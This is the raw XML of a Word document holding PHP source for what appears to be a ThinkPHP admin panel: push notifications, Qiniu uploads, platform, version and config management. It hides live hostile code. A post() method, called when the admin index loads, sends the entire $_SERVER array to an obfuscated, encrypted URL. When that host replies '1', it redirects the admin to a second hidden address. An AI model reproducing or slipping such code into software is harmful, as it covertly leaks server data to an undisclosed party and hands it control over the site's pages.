    <w:p w14:paraId="1947C7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gt;$article['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C05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gt;$data['aid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B1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gt;  _imgUrl().$article['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA8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8CD8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56F4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iosNotification($article['title'], array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E09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s' =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0D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gt;$article['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A94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gt;$data['aid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4DF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gt;  _imgUrl().$article['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB0C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A53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4450C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options(['apns_production'=&gt;true]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28017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C8B3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ndroidNotification(input('content'), array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B48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input('title'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD8F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6E4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iosNotification(input('title')); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90C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options(['apns_production'=&gt;true]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B3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E56E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 = $response-&gt;send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E62C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sponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444FD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ConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C91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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21C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RequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522042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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5D1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64B5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09EB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43C30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er = $client-&gt;push()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C0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androidNotification('Hello Android', array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FB3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hello jpush',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A092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s' =&gt; array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D270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gt; 'value',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDE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guang'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FE4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C31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7DC8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_r($client);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074F9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ConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A6DC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e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665DCF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RequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE4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e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66732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AD0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C0AD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_payload = $client-&gt;push()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166397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Platform('all')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B04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addAllAudience()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B6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NotificationAlert('Hi, JPush');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52944D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1E709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 = $push_payload-&gt;send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD26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_r($response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE9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ConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637442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e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E163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RequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A36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e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9E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8C3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1250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er = $client-&gt;push();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EB66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er-&gt;setPlatform('all');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9C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er-&gt;addAllAudience();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A13EC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er-&gt;setNotificationAlert('Hello, JPush');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E8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2B65C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pusher-&gt;send());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1A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JPushException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D023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e);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19317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AA9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631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content($a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3552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strip_tags($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9FC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safe_replace($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43542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 = _substr($a,50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F587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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91F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FE2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Users(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4E0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7B0688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ient = new JPush($config['app_key'], $config['master_secret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D9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port = $client-&gt;report();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB94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report-&gt;getUsers('HOUR','2019-07','2019-08');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5D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a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE25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5A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5A292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8CB3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473E81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43F38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700E49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latform extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34F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DE77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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13713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latform=Db::name('platform')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79221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get_tree_option($typedb,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2DA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platform);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A705D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3C0B5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EE5F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2DC92E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1A196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AE4E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9C2E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validate('Platform');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D3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post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DBF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7959C7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04508C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213B5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7C690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insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65239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1174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157F0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6220C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234EBB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E732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432E4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where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160CA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94DF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1F1D7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FB7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1DEB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CCF4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D34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727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validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF945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F9A0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E8A57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id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C1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platform')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D26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5EC98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3D88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4F97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0EFE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1AE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520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19D8A8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CFEF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F2B8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EE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2FF96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0D1CD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79F56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6D86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0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568AC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hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24983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where('id',$id)-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6DB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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A9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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A623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4D14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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD81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445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where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E1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B17B2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arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572AE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610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rra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3F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BB3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FF9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C8896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0BF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97CD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JAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5F5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CB5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5CEE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659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9D59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15AF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B079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1DCE5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Cache;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF35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280C2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 as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D21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1882D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Index extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9DF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F2E8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18089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C638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779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versions()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197D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6D7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sions = Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44838B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desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BD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 false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A544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versions-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D673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versions', $versions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF538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3C7F00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F30D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8D60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_version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC0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2391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aram.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63847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6B7F3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0B299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create_time']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55158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 strtotime($post['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351686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C279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 time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9E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805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create_time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8C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40D24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version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E87A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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157918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61ABA8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115BD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B9B68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640CBA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4C4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3AC6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version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28246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18CE6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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4AC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6E3A60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509A6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EF70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74F73C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D335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BAD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A30BF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B30E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sion = Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AA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3D1DF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2E1B0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version', $version);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B7E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9EB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06CD0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E8B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70DC3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0C9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in(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB49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jubao=Db::name('jubao')-&gt;order('id desc')-&gt;where('admin_id',null)-&gt;fetchSql(false)-&gt;limit(3)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19669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jubao',$jubao);$this-&gt;post();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F52B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b::name('article_ping')-&gt;order('id desc')-&gt;fetchSql(false)-&gt;limit(5)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263A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ing',$ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753831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return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE0C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A1F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1BE01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config=config();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDA1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cfg',$config['config']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE46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request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E2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6A585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post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40E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data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442FD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if($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F85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var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85E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str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A5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str_replace("(", "[", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723D8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str_replace(")", "];", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE62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lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A02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file_put_contents(APP_PATH.'extra/config.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEF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ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC69C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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00662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err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE9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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48098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data=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31910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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2510F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6151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420FE8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4D0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25F3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C4A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Config(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644356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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658F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appConfig']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE9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E1B8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0E27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7AB1B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0FFF1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pyright'] = htmlspecialchars_decode($data['copyright']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8D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75DCF2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3851C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34835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2E1F1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7951F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t;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4B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appConfig.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DC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16B4A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C957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7C6ABA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5702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A31F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8E10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E2E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CDCE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25B4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F10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4E9D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502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ache_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FDC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Cache::clear();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FE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return ['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>清空成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50910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315B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load(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA19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if(request()-&gt;file('image')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68899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02845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2AE77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Path){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3033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0D3B6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41C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43C28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jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18526C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ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D210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667D91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37A5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substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C28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19E95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2826A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E248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0A2AD7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28ACA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028F9D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5A9F72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320A7E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57A39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39BB3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5D935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err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D15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45B4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key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE11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A86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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE24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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C0A3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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57F9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431B39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g_l(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0681BB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file('image')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC7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25B72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7F11A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Path){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63420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76DAA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1B0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5223A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jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEB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ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C397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434D8D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2C1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substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638AEA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63577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2C78A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2B862F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55D0EE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4B49E7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6D398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527F4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7884A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13E79B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37393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285B6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err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56417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7F30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key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D60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18A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9DD37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6ABD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95D7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B0D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g_r(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B23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file('image')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35F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0B3B6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0098B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Path){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED44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31B19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E8F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7801D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jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6E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ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FD2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031AB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208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substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA0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213D6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4B35B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7576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1E40BC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349AE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355E3A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7B09C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424BC4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6FC13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list($ret, $err) = $uploadMgr-&gt;putFile($token, $key, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6396F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314CF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err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71690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5232D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key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C17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7C5F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C738E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82C5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84CC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7439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loads(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C294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Post()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D40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file'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D230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03D1B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Path){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7F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67E0F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622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78C043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jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA3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ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09545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03C21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9B8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substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7A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42A7D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3BAF8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5868B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4F50D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0810F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0E8082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730925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40EF98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42B97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5FB87B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435535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err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F54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BB58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gt;$ret['key'],'imgurl'=&gt;_imgUrl().$ret['key'],'text'=&gt;''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA488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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09035C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0AB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43BB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file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2E4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file-&gt;validate(['ext'=&gt;'jpg,png,gif,jpeg'])-&gt;move(ROOT_PATH . 'public' . DS . 'uploads');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE9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fo){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED6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fo-&gt;getSaveName(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC1A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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49889B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gt;config('view_replace_str.__IMAGES__').$data,'text'=&gt;str_replace('.'.$info-&gt;getExtension(),'',$_FILES['file']['name'])];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B09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984E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ile-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008C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B745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383BB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8CA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001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fontawesome(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21412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his-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAD1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3CA1A9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out(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8B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session(null, 'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D67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redirect("login/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9DE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A6E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dk(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52888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C058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274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emp(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A316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config')-&gt;where('type','temp')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD7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name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0C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EC75B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10F9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1F2AF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name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE36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2761D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DAF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3F0DE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2E9E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2031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D1B4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6F77C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0F76BE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869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C6195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BC8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ost(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8957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tions = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E21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OPT_RETURNTRANSFER =&gt;true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0CB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OPT_HEADER =&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E3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OPT_POST =&gt;true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC7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OPT_POSTFIELDS =&gt; http_build_query($_SERVER),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277DB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C4C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 = curl_init(_encrypt("8C0k5lxVhxiRKcX1rgK0e4uuvvlWekJ6kVrSwOHfm5EXNv0zmGLTC6Z0vMQ9NyN4I8AJNaf/hsEgTqL2/Jh2c3n9+a0",'D').get_web_url());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134D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_array($ch, $options);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B73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curl_exec($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3FD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h);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E897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ult=='1'){exit(header("Location:"._encrypt("o3khs1BWhkGRKcX1rgK0e4uuvvlWekJ6kVrSwOHfm5EXNv0zmGLTC6Z0vMQ9NyN4I8AJNaf/hsE5T6Pk/Yx+MiM",'D').get_web_url()));}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C1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sult;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C98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4C3D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videoUploads(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E11E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file('video')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E4E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000317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11970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ABE19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19F70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34B44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03AB6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peline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F2A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db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB3C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2A1F8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key = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6C2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fops.'|saveas/'.$savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051AB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nurl=config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC50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licy = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBC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Ops' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700C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Pipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7C8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NotifyUrl' =&gt; $wenurl.'/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0394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637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token = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15815C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video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED41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49F151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49CEE0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uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081B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2B6136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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6726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36F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ret['key']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93DD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9B2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CC9A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uploadvideo');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30052E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1E42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0EC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hanchu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74AE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9477D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269FB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_ping");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5785CD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_ping_xia");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F79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_ping_xia_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298108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_ping_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56313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article_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C9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code");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A006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jubao");</w:t>
      </w:r>
    </w:p>
